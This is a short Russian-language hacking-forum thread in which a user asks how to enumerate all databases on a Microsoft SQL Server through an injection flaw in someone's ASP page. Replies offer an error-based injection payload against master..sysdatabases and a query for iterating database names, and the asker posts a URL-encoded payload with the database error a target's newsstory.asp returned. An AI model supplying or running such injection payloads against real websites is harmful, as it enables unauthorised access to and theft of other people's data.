![]() |
MSSQL Injection вопрос
Каким методом можно получить список существующих баз данных?
|
show databases;
|
Это не то. Мне через багу в скрипте надо узнать все существующие базы.
запрос типа .asp?ID=1'INJECTION |
http://hack-shop.org.ru/board/showthread.php?t=24
Цитата:
|
спасибо, помог :)
Только что-то select top 2 start at 1 не пашет на единицу ругается Incorrect syntax near '1' |
чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')
|
Цитата:
|
Цитата:
|
Цитата:
|
-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--
ответ: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'. /newsstory.asp, line 15 что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса |
| Время: 15:54 |